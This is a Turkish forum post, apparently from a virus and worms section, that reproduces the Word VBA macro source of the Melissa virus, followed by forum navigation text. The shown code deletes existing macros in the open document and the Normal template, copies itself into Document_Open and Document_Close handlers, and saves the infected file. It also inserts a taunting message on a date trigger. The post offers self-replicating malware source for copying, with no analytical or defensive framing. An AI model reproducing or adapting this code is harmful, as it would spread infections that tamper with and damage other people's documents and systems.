If ADI1.Name <> "Melissa" Then
If ADCL > 0 Then ADI1.CodeModule.DeleteLines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = "Melissa"
DoAD = True
End If

If NTI1.Name <> "Melissa" Then
If NTCL > 0 Then NTI1.CodeModule.DeleteLines 1, NTCL
Set ToInfect = NTI1
NTI1.Name = "Melissa"
DoNT = True
End If

If DoNT <> True And DoAD <> True Then GoTo CYA

If DoNT = True Then
Do While ADI1.CodeModule.Lines(1, 1) = ""
ADI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If

If DoAD = True Then
Do While NTI1.CodeModule.Lines(1, 1) = ""
NTI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If

CYA:

If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True
End If

If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here."
End Sub
Sayfa başına dön Aşağa gitmek
http://www.intekfrm.com

melisa virüsü

Önceki başlık Sonraki başlık Sayfa başına dön
1 sayfadaki 1 sayfası

Bu forumun müsaadesi var: Bu forumdaki mesajlara cevap veremezsiniz
İnTeRNeT TeKNoNoJi KuRuMLaRı FoRMu :: _------------۩۞۩๑ MsN İLe İLgiLi HeRŞeY ۩۞۩๑----------_ :: Virus - Trojan - Worms -